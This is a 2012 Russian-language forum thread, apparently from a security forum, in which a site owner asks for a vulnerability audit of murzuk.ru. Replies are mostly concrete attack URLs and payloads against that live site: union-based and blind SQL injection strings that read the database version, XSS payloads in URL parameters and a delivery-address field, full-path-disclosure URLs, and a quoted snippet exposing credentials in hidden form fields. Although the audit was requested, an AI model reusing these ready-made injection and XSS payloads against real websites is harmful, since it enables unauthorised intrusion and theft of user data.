PDA

Просмотр полной версии : Аудит


Ranow
22.10.2012, 17:54
Помогите провести аудит сайта на уязвимости и исправить их. Сайт - http://murzuk.ru
P.S. Вопрос вознаграждения давайте обсудим в личке! Заранее огромное спасибо!

kingbeef
22.10.2012, 18:07
http://murzuk.ru/show_good.php?idtov=-35007'+union+select+1,2,3,version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20--+f

5.0.92-log

http://murzuk.ru/osnov_cart.php?c=9&new=777384'

Раскрытие путей.


UPD.
Xss

http://murzuk.ru/osnov_cart.php?c=2
Уязвимое поле "Адрес доставки"

<svg/onload=alert(/xss/)>

Jokester
22.10.2012, 18:34
https://rdot.org/forum/showthread.php?t=26

Не будет баннера акк пойдёт в бан

Ranow
22.10.2012, 18:50
готово

Jokester
22.10.2012, 18:54
спасибо

BlackFan
22.10.2012, 19:57
xss
http://murzuk.ru/show_cat2.php?grid=2141&catid=2171%3E%3Ch1%3Exss
http://murzuk.ru/show_fine.php?dd=23&grid=51%3E%3Ch1%3Exss
http://murzuk.ru/osnov_cart.php?c=9
post
a555039:><h1>xss


fpd
http://murzuk.ru/show_cart2.php?&new=-1
http://murzuk.ru/show_silk.php


sqli
http://murzuk.ru/show_cart2.php?&new=555040'+and+0+union+select+1,2,3,version(),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+-

M_script
22.10.2012, 20:13
http://murzuk.ru/osnov_cart.php?c=2
<input type=hidden name=username value=\"".$username."\">
<input type=hidden name=passwd value=\"".$passwd."\">
<input type=hidden name=passwd2 value=\"".$passwd2."\">

что это?

Ranow
22.10.2012, 22:03
Ищу специалиста по устранению ошибок...пишите в личку, обсудим оплату.

Pashkela
22.10.2012, 22:46
blind sqli

http://murzuk.ru/show_foto.php?idft=30+and(mid(version(),1,1)=5)
http://murzuk.ru/show_foto.php?idft=30+and(mid(version(),3,1)=0)
http://murzuk.ru/osnov.php?c=46&idgrdesk=1'+and(mid(version(),1,1)=5)and'1

Ranow
23.10.2012, 14:17
Спасибо, тему можно закрывать!